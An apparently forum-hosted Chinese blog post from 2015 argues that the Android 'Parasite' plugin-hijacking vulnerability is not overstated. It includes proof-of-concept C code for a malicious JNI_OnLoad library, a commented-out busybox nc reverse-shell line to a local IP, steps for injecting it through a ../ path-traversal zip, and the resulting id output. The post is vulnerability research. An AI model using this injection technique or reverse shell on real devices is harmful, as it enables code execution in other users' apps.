Android寄生兽漏洞并非夸大

踩(0)

顶(3)

瘦蛟舞 (科普是一种公益行为) | 2015-07-10 18:44

川大信安文章被夸大的安卓漏洞“寄生兽” 中指出

实际上大部分app都会将插件的缓存文件存放在私有目录下，由于Android的沙箱机制，攻击者要利用这个漏洞首先需要突破沙箱保护。可以看到，360提出的4种攻击场景全部利用了其他的漏洞或者app开发者的粗心大意，从而突破了沙箱保护。
另一方面，由于odex文件与VM版本相关，同一个odex无法在多个设备中正常运行，攻击者需要对识别不同的设备并适配不同的恶意odex，漏洞利用成本进一步加大。
总结一下漏洞利用成功的先决条件：
1.Android版本低于5.0
2.利用了其他可突破沙箱保护的 漏洞
3.适配设备的odex文件实例

文章理论均正确,但是我认为此漏洞并非夸大.

首先现在绝大部分手机都在 android5.0以下.其次利用解压缩../跨目录本就是此漏洞利用亮点之一.

再次注入的时候可以选择 so 这样就不需要适配机型(覆盖 arm 和 x64的即可)

jint JNICALL JNI_OnLoad(JavaVM* vm, void* reserved)
{
    JNIEnv* env = NULL;
    jint result = -1;
    int ret;

    if ((*vm)->GetEnv(vm, (void**) &env, JNI_VERSION_1_4) != JNI_OK) {
        return -1;
    }
    /* success -- return valid version number */
    result = JNI_VERSION_1_4;
//    ret = system("busybox nc 192.168.1.50 8088|/system/bin/sh|busybox nc 192.168.1.50 9999");
    ret = system("id > /sdcard/jni_id.txt");
    LOGI("ret value of system is %d",ret);

    return result;
}

ndk 编译上述代码后追加到原有 so,再利用制作../的压缩包 exp.

$ cat  /sdcard/jni_id.txt                                
uid=10158(u0_a158) gid=10158(u0_a158) groups=1015(sdcard_rw),1028(sdcard_r),3002(net_bt),3003(inet),50158(all_a158) context=u:r:untrusted_app:s0

PS:

2.DexClassLoader方法的第二个参数（即odex的存放路径）不要指定在sdcard上

这样写直接会报错...